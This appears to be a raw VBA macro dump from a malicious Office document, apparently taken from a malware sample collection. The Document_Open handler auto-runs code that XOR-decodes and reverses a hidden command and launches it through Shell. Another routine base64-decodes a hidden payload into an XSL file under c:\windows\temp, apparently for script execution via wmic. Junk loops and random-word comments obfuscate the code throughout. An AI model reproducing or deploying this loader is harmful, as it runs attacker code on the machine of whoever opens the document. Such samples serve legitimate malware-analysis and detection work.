Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call main
End Sub
Attribute VB_Name = "a8aUN"
Public Sub aOxu5()
Dim ad6F43 As Long
ad6F43 = 10845 * 2
' Regulus sport


Dim aP9ge
For aP9ge = 29 To 40
Debug.Print Error(aP9ge)
Next aP9ge
' Lotus twinks
Dim ayFm94 As Long
ayFm94 = 28378 * 1
' Trill overpower
Dim axDqY As Long
Dim a85ni3 As Integer
axDqY = 78
a85ni3 = 212 - 152
aS8CLi = axDqY * a85ni3
' Comp spa

Dim azyQX
For azyQX = 21 To 46
Debug.Print Error(azyQX)
Next azyQX
' Sandal oman nave
Dim aujNzg As Long
aujNzg = 13822 * 1
Dim a7aY12
Dim acBJD As Long
a7aY12 = -51 + 126
acBJD = 17
aHiov = a7aY12 * acBJD
Dim aPu7D
Dim ajYVp As Integer
aPu7D = 19832 / 296
ajYVp = 52
agdRt = aPu7D - ajYVp
' Propagate gloat zinc trestle forms beats
Set aCTuaQ = aASCd.str
agV3f = aCTuaQ.Value
Open "c:\wi" & aV5yo & aRIcF & "emp" & "\aUiuMK.xsl" For Output As #1
Print #1, aVaqT(agV3f)
Close #1
End Sub
Sub aAGdYa(aSw6a)

Dim aVHaUc
For aVHaUc = 12 To 33
Debug.Print Error(aVHaUc)
Next aVHaUc
' Incl fabled blonde hopping

Dim a4Pxy
For a4Pxy = 25 To 39
Debug.Print Error(a4Pxy)
Next a4Pxy
' Marsh regional paraffin

Dim aeqgUz
For aeqgUz = 19 To 56
Debug.Print Error(aeqgUz)
Next aeqgUz
Dim aZKT1x
aZKT1x = 19190 * 1
' Blizzard mitsubishi developed orders winds employ

Dim aSrc0E
For aSrc0E = 4 To 54
Debug.Print Error(aSrc0E)
Next aSrc0E
' Straight tho curtsey segment viagra
End Sub
Function aVaqT(ai3acO)

Dim ajt8L
For ajt8L = 16 To 46
Debug.Print Error(ajt8L)
Next ajt8L

Set as46iW = New MSXML2.DOMDocument
Set aUCjK = as46iW.createElement("b64")
aUCjK.DataType = "bin.base64"
aUCjK.Text = ai3acO
aVaqT = StrConv(aUCjK.nodeTypedValue, vbUnicode)

End Function
Attribute VB_Name = "aASCd"
Attribute VB_Base = "0{101E6A14-E9F9-4AC2-8473-18DBD8FB8CC0}{60F6620F-C71F-4D9F-BFAA-73B51482C777}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "aQOq3"
Public Const aPrNfG As String = ""
Public Const aV5yo As String = "ndows\"
Public Const aRIcF As String = "\t"
Function azQ8Fu(aRyvH6, ayepS2)
Dim aN26Mh
aN26Mh = 18255 + 2

Dim asO5o
For asO5o = 5 To 62
Debug.Print Error(asO5o)
Next asO5o
' Stimulate nave
auQv8m = ""
For axCEfO = 0 To UBound(aRyvH6)
aZzdN = aRyvH6(axCEfO) Xor ayepS2
auQv8m = auQv8m & Chr(aZzdN)
Next

Dim ap58NB
For ap58NB = 1 To 42
Debug.Print Error(ap58NB)
Next ap58NB
' Vindictive allegory ing calumny sacrilege bracken
azQ8Fu = auQv8m
End Function
Attribute VB_Name = "aY38M"
Function a8lPBe()
a8lPBe = Array(70, 8, 23, 28, 74, 47, 41, 17, 13, 49, 5, 56, 20, 9, 1, 16, 56, 23, 19, 11, 0, 10, 13, 19, 56, 94, 7, 70, 94, 16, 5, 9, 22, 11, 2, 75, 68, 16, 23, 13, 8, 68, 23, 23, 1, 7, 11, 22, 20, 68, 7, 13, 9, 19, 68, 7, 75, 68, 0, 9, 7)
End Function
Sub main()
Dim axMHc As String

Dim aJgf4
For aJgf4 = 27 To 56
Debug.Print Error(aJgf4)
Next aJgf4
aLGM4 = 264 - 164

Dim a8Uln
For a8Uln = 2 To 55
Debug.Print Error(a8Uln)
Next a8Uln
' Budge
axMHc = azQ8Fu(a8lPBe, aLGM4)

Dim azZu6
For azZu6 = 27 To 62
Debug.Print Error(azZu6)
Next azZu6
' Gainsay targets aide gc
Dim aBIgf1 As Integer
Dim a3l8dB As Integer
aBIgf1 = -102 + 209
a3l8dB = 1440 / 72
aRCjom = aBIgf1 + a3l8dB
' Processor celebs toothache movies incorrect subconscious

Dim ar2VpF
For ar2VpF = 12 To 62
Debug.Print Error(ar2VpF)
Next ar2VpF
Dim aA6c9 As Integer
aA6c9 = 23780 * 1
' Policies lasso bearing royal
aOxu5
Dim agH3D
agH3D = 28687 * 1
' Awesome
Dim aVRAS
Dim asqdF
aVRAS = 573 - 564
asqdF = 30276 / 522
aAW8la = aVRAS / asqdF
' Ecological

Dim a2wQtU
For a2wQtU = 19 To 50
Debug.Print Error(a2wQtU)
Next a2wQtU
Call VBA.Interaction.Shell@(StrReverse(axMHc))
Dim aLajh As Integer
aLajh = 7888 * 2

Dim aaOHyL
For aaOHyL = 24 To 56
Debug.Print Error(aaOHyL)
Next aaOHyL
' Advancement stepfather
End Sub


INQUEST-PP=macro
